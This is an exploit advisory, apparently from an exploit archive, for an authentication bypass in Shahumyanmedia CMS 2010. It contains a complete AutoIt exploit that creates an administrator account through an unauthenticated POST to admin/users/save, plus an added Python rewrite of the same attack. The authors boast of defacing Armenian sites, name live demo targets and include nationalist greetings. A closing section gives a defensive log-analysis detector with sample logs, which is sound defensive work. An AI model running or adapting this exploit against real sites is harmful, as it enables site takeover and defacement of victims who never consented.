Shahumyanmedia CMS_2010_Auth_ByPass

2012.07.23
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

========================================================
Vulnerable Software: Shahumyanmedia CMS 2010
Vendor: Shahumyan Media
Official site: http://shahumyanmedia.com/
========================================================

First we want to say: it is not a widely used CMS. Only some 30-40 .am sites use it, and it is a commercial product.

This CMS is prone to an authentication bypass vulnerability. As the exploit below shows, the administrative user-save handler (admin/users/save) accepts a POST from a client that holds no session at all and creates the account described in the form fields, including one with the administrative user type. We used it to deface those .am sites (BTW, nice 0day xD). But now we are going to 0day it and disclose the exploit, which is written by us too, as we promised to the @itsec guy. ha ha ha))))))

The exploit is written in the AutoIt programming/scripting language.

*In some cases it may not work for you even if the target site is vulnerable.* This isn't our fault; it is because the UDF it uses (the WinHttp.au3 wrapper around the WinHTTP component) is a bit buggy. But it is a really nice UDF. Anyway, if you want successful exploitation, use a PPPoE connection and it will work for you.

You can find binaries of the exploit (32-bit and 64-bit) in the archive; the source code of the exploit is also included. On successful exploitation it adds a new administrative account to the target site. We will also disclose "Demo" sites on which the exploitation can be reproduced.

ENjoy)
/AkaStep & BOT_25

========================================================
Source code of exploit:

NOTE: The exploit was tested on a Win XP SP2 machine against real sites. Works for me like a charm.
Print screen 1: http://s017.radikal.ru/i434/1207/44/a3737fb99fab.png
Print screen 2: http://s56.radikal.ru/i151/1207/db/6916d93618a3.png

=====================BEGIN==============================
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Version=beta
#AutoIt3Wrapper_Icon=best.ico
#AutoIt3Wrapper_Outfile=shpoc32.exe
#AutoIt3Wrapper_Outfile_x64=shpoc64.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Compile_Both=y
#AutoIt3Wrapper_UseX64=y
#AutoIt3Wrapper_Res_Comment=AkaStep & BOT_25
#AutoIt3Wrapper_Res_Description=AkaStep & BOT_25
#AutoIt3Wrapper_Res_Fileversion=3.1.6.1
#AutoIt3Wrapper_Res_LegalCopyright=AkaStep & BOT_25
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <GuiStatusBar.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include "WinHttp.au3"
#include <String.au3>

#cs
This Is a Private Exploit against shahumyanmedia cms.
But for now, after a lot of defacement of .am sites, we think we can disclose it.
On successful exploitation it will add a new administrator to the target site.
Vuln type: Authentication Bypass.
Vuln and Exploit Discovered By *AkaStep & BOT_25*
Shoutz to All Azerbaijan Black Hatz!
*Fiery greetings to Azerbaijan and to our Turkish brothers!*
23 July 2012
Demo 1: www.eurovision.am
Demo 2: safecity.am
And Google for " 2010 Shahumyan Media"
admin page: eurovision.am/admin/
#ce

; GUI: target, username and password inputs plus Exploit/About buttons.
$Form1 = GUICreate("shahumyanmedia cms Auth Bypass Exploit", 414, 292, -1, -1)
GUISetBkColor(0x000000)
$Input1 = GUICtrlCreateInput("0dayforyou", 184, 136, 137, 21)
GUICtrlSetLimit(-1,30)
$Input2 = GUICtrlCreateInput("0dayforyou", 184, 176, 137, 21)
GUICtrlSetLimit(-1,30)
$Label1 = GUICtrlCreateLabel("Username", 80, 136, 76, 25, $SS_CENTER)
GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Label2 = GUICtrlCreateLabel("Password", 80, 176, 74, 25, $SS_CENTER)
GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Exploit = GUICtrlCreateButton("Exploit", 24, 224, 153, 25)
$Label3 = GUICtrlCreateLabel("Target Site", 80, 96, 88, 17)
GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Input3 = GUICtrlCreateInput("site.tld", 184, 96, 137, 21)
GUICtrlSetLimit(-1,30)
$About = GUICtrlCreateButton("About", 224, 224, 177, 25)
$StatusBar1 = _GUICtrlStatusBar_Create($Form1)
_GUICtrlStatusBar_SetMinHeight($StatusBar1, 25)
_GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
$Label4 = GUICtrlCreateLabel("0day From Azerbaijan Black Hatz", 24, 24, 362, 36, $SS_CENTER)
GUICtrlSetFont(-1, 14, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Group1 = GUICtrlCreateGroup("", 8, 8, 401, 201)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)

While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
        Case $GUI_EVENT_CLOSE
            $uzanmusdunda_niye_bele_tez_gedirsen=MsgBox(262209,"","Exit?")
            If $uzanmusdunda_niye_bele_tez_gedirsen=1 Then
                MsgBox(262208,"","Ok...Byee)",10)
                Exit
            EndIf
        Case $Exploit
            GUICtrlSetState($Exploit,$GUI_DISABLE)
            ; The save handler refuses a username that already exists, so the user must pick a fresh one.
            $askforuniquename=MsgBox(262209,"","Before Proceeding make Sure you are using Unique" & @CRLF & "and Not Existent User name on target site" & @CRLF & _
                "Otherwise Exploit may fail for you" & @CRLF & _
                "Are you Ready?")
            If $askforuniquename=1 Then
                _GUICtrlStatusBar_SetText($StatusBar1,'Working... Please Wait...')
                Sleep(Random(1000,1800,1)); # Some random sleep.
                $targetsite=GUICtrlRead($Input3)
                $adduser=GUICtrlRead($Input1)
                $addpass=GUICtrlRead($Input2)
                blackexploit($targetsite,$adduser,$addpass); passing it to function.
            Else
                GUICtrlSetState($Exploit,$GUI_ENABLE)
            EndIf
        Case $About
            GUICtrlSetState($About,$GUI_DISABLE)
            $creditstoAzerbaijan_blackhatz="This exploit Coded By AkaStep." & @CRLF & _
                "The vulnerability Discovered By BOT_25~AkaStep" & @CRLF & "Hope You Will Enjoy while Using It) Meh Meh))))" & @CRLF & "Also Special Respect to My Bro CAMO." & @CRLF & ' WwW.ANTI-armenia.ORG '
            MsgBox(262208,"",$creditstoAzerbaijan_blackhatz);
            GUICtrlSetState($About,$GUI_ENABLE)
    EndSwitch
WEnd

; Sends one unauthenticated POST to admin/users/save; no cookie or session token is ever set.
Func blackexploit($targetsite,$adduser,$addpass)
    _GUICtrlStatusBar_SetText($StatusBar1,'Opening Connection to Target Site... Please Wait...')
    Sleep(Random(1000,1800,1)); # Some random sleep.
    #cs
    Begin Send Data
    #ce
    $triggerforsuccess='{"result":1,"message":""}'; JSON body the handler returns when the user was created
    $bad1='http://'
    $bad2='/'
    $targetsite=StringReplace(StringReplace($targetsite,$bad1,''),'/','');# Some CLeanup #
    Global $sAddress = $targetsite
    ; Min/Max were reversed in the original release (156788111,54614128); AutoIt's Random() needs Min <= Max.
    $rndstr=Random(54614128,156788111,1) & '@pipi.tld'; xD
    $rndmail=$rndstr
    ;~ Payload to add administrative user (user_type_id=1, user_id=0 = create new record).
    Global $sPostData = "username=" & $adduser & "&password=" &$addpass & "&email=" & $rndmail &"&user_type_id=1&firstname_en=" & $adduser & "&lastname_en=" & $adduser & "&secondname_en=" & $adduser & "&firstname_am=&lastname_am=&secondname_am=&firstname_ru=&lastname_ru=&secondname_ru=&user_id=0&x-technology=ajax"
    Global $hOpen = _WinHttpOpen("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2")
    Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
    Global $hRequest = _WinHttpOpenRequest($hConnect, _
        "POST", _
        "admin/users/save", _
        Default, _
        Default, _
        "application/json, text/javascript, */*")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
    _WinHttpAddRequestHeaders($hRequest, "DNT: 1")
    _WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")
    _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
    _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded; charset=UTF-8")
    _WinHttpAddRequestHeaders($hRequest, "X-Requested-With: XMLHttpRequest")
    _WinHttpSendRequest($hRequest, -1, $sPostData)
    _WinHttpReceiveResponse($hRequest)
    Global $sHeader, $sReturned
    If _WinHttpQueryDataAvailable($hRequest) Then
        $sHeader = _WinHttpQueryHeaders($hRequest)
        Do
            $sReturned &= _WinHttpReadData($hRequest)
        Until @error
        ;success or fail
        If StringInStr($sReturned,$triggerforsuccess) Then
            GUICtrlSetState($Exploit,$GUI_ENABLE)
            $tolog="Target Site is Vulnerable and exploiting of Vulnerability was Successfull!" & @CRLF & _
                _StringRepeat('-',30) & @CRLF & _
                'Login Page: ' & $targetsite & '/admin/' & @CRLF & _
                'Your Administrative User: ' & $adduser & @CRLF & _
                'PassWord: ' & $addpass & @CRLF & _
                _StringRepeat('-',30) & @CRLF & 'Enjoy:)'
            _GUICtrlStatusBar_SetText($StatusBar1,'Exploit Was Successfull!')
            Sleep(300);
            FileWrite(@ScriptDir & "\exploitlog.txt",@CRLF & $tolog & @CRLF)
            MsgBox(262208,"Exploited!", $tolog)
            _GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
        Else
            GUICtrlSetState($Exploit,$GUI_ENABLE)
            _GUICtrlStatusBar_SetText($StatusBar1,'Exploit Failed...')
            MsgBox(262192,"Exploit Failed:(","Seems Target Site is not vulnerable...");
            _GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
        EndIf
    Else
        _GUICtrlStatusBar_SetText($StatusBar1,'WTF?')
        MsgBox(262192, "Error!", "No internet Connection or Incorrect Domain Name?.")
        _GUICtrlStatusBar_SetText($StatusBar1,'')
        GUICtrlSetState($Exploit,$GUI_ENABLE)
    EndIf
    _WinHttpCloseHandle($hRequest)
    _WinHttpCloseHandle($hConnect)
    _WinHttpCloseHandle($hOpen)
    #cs
    End SEND DATA
    #ce
EndFunc; => blackexploit()
=====================END OF============================

Binary && src you will find in the attachment named: 0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip

MD5 SUM:
=======================================================
$ md5sum 0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
4cb562fc1fa839e50ea8b6462967ea01 *0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
=======================================================

********************* AZERBAIJAN BLACK HATZ ***********************************
Of course we never forget our friends, so A BIG RESPECT + THANKS TO ALL:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3.*
===========================================================
Thanks & Respect!
/AkaStep & BOT_25
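The request the AutoIt tool sends, rebuilt in Python as an added example (editor's code, not the advisory's or the vendor's). Only the endpoint, the form field names, the User-Agent and the JSON success marker are taken from the advisory's payload; the helper names, the "audit" username prefix and the example.invalid e-mail domain are this example's own choices. It splits the exploit into pieces that can be checked offline: target normalisation (the original only deletes "http://" and every "/", so "https://site.tld" or "site.tld/admin/" produce a broken host), a guaranteed-unique username (the advisory says the request fails for an existing one), and a JSON parse of the reply instead of a substring match.

```python
import json
import secrets
from urllib.parse import urlencode, urlparse
from urllib.request import Request, urlopen

ADMIN_SAVE_PATH = "/admin/users/save"   # handler the advisory's exploit POSTs to
USER_AGENT = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2"


def normalize_target(target: str) -> str:
    """Return host[:port] for whatever was typed into the 'Target Site' box.

    The AutoIt tool strips 'http://' and every '/', so 'https://site.tld' turns
    into 'https:site.tld' and 'site.tld/admin/' into 'site.tldadmin'. Parsing
    the URL handles scheme, path and an explicit port correctly.
    """
    target = target.strip()
    if "://" not in target:
        target = "http://" + target
    parsed = urlparse(target)
    if not parsed.hostname:
        raise ValueError(f"no host in target {target!r}")
    return parsed.netloc.lower()


def unique_username(prefix: str = "audit") -> str:
    """The handler rejects an existing username; 8 random hex digits avoid collisions."""
    return prefix + secrets.token_hex(4)


def build_post_body(username: str, password: str, email: str) -> str:
    """Form body with exactly the fields of the advisory's payload.

    user_type_id=1 is the value the exploit sends for an administrative account;
    user_id=0 is read here as 'create, not update' (assumption: the advisory only
    shows the value, not the handler's logic).
    """
    fields = [
        ("username", username), ("password", password), ("email", email),
        ("user_type_id", 1),
        ("firstname_en", username), ("lastname_en", username), ("secondname_en", username),
        ("firstname_am", ""), ("lastname_am", ""), ("secondname_am", ""),
        ("firstname_ru", ""), ("lastname_ru", ""), ("secondname_ru", ""),
        ("user_id", 0), ("x-technology", "ajax"),
    ]
    return urlencode(fields)


def build_request(target: str, username: str, password: str, email: str) -> Request:
    """Build the POST. No Cookie header is set on purpose: the bypass is that the
    save handler never checks for an administrator session."""
    host = normalize_target(target)
    req = Request(f"http://{host}{ADMIN_SAVE_PATH}",
                  data=build_post_body(username, password, email).encode(),
                  method="POST")
    req.add_header("User-Agent", USER_AGENT)
    req.add_header("Accept", "application/json, text/javascript, */*")
    req.add_header("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8")
    req.add_header("X-Requested-With", "XMLHttpRequest")
    return req


def is_success(response_body: bytes) -> bool:
    """True only for the JSON success reply the exploit looks for.

    Parsing tolerates whitespace and key order ({"result": 1, "message": ""});
    an HTML login page, an error JSON or a non-object reply all return False.
    """
    try:
        data = json.loads(response_body.decode("utf-8"))
    except ValueError:            # JSONDecodeError and UnicodeDecodeError both derive from it
        return False
    return isinstance(data, dict) and data.get("result") == 1 and data.get("message", "") == ""


def check_target(target: str, password: str, timeout: float = 15.0) -> dict:
    """Send one request and report the outcome. Creates a real admin account on a
    vulnerable host, so run it only against systems you are authorised to test."""
    username = unique_username()
    req = build_request(target, username, password, f"{username}@example.invalid")
    with urlopen(req, timeout=timeout) as resp:          # network call, not exercised offline
        body = resp.read()
    return {
        "vulnerable": is_success(body),
        "username": username,
        "login_page": f"http://{normalize_target(target)}/admin/",
    }
```

A single successful reply is the whole proof: the account exists as soon as `is_success` returns True, so an authorised test should be followed by deleting the user from the CMS. Note that the check is a creation, not a read; there is no non-destructive probe for this bug.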
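For an operator of one of these sites, the question is whether the handler has already been hit. The following detection is an added example (editor's code, not from the advisory), written for web-server access logs in the Apache/nginx "combined" format. It assumes that a legitimate administrator loads the /admin/ login page (the page the advisory names) before the browser ever POSTs to /admin/users/save, whereas the exploit goes straight to the handler with no session; combined logs carry no session identifier, so "never fetched /admin/ earlier" is the available proxy. The sample log lines are constructed for the example.

```python
import re
from typing import Iterable, List, Optional

COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
ADMIN_LOGIN_PATH = "/admin"              # compared with any trailing slash removed
ADMIN_SAVE_PATH = "/admin/users/save"    # handler the advisory's exploit POSTs to
# User-Agent hard-coded in the advisory's exploit; trivially changed, so only a secondary signal
EXPLOIT_UA = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2"


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields; None for lines that do not match."""
    m = COMBINED_LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_suspicious_user_saves(lines: Iterable[str]) -> List[dict]:
    """Flag each POST to the user-save handler from a client that had not fetched
    the admin login page earlier in the log.

    An administrator who logged in from a different address is a false positive,
    so treat hits as leads: the hard evidence is a new account with user_type_id=1
    in the CMS user table whose creation time matches the flagged request.
    """
    saw_login_page = set()
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "GET" and path.rstrip("/") == ADMIN_LOGIN_PATH:
            saw_login_page.add(rec["ip"])
        elif (rec["method"] == "POST" and path == ADMIN_SAVE_PATH
              and rec["ip"] not in saw_login_page):
            hits.append({
                "ip": rec["ip"],
                "time": rec["ts"],
                "status": int(rec["status"]),
                "exploit_ua": rec["ua"] == EXPLOIT_UA,
            })
    return hits


# Constructed sample: one administrator who loads /admin/ and then saves a user,
# and one client that goes straight to the handler with the exploit's User-Agent
# (the 25-byte 200 reply is the length of {"result":1,"message":""}).
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jul/2012:14:02:11 +0400] "GET /admin/ HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jul/2012:14:03:05 +0400] "POST /admin/users/save HTTP/1.1" 200 25 "http://site.tld/admin/" "Mozilla/5.0"
198.51.100.9 - - [23/Jul/2012:15:10:02 +0400] "POST /admin/users/save HTTP/1.1" 200 25 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2"
198.51.100.9 - - [23/Jul/2012:15:10:03 +0400] "GET /admin/ HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in find_suspicious_user_saves(SAMPLE_LOG.splitlines()):
        print(hit)
```

The order check matters: the second client fetches /admin/ one second after its POST, which is what the exploit's success dialog tells the attacker to do (visit the login page with the new credentials), and that visit must not whitewash the earlier save.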

References:

http://s017.radikal.ru/i434/1207/44/a3737fb99fab.png
http://s56.radikal.ru/i151/1207/db/6916d93618a3.png



Copyright 2024, cxsecurity.com
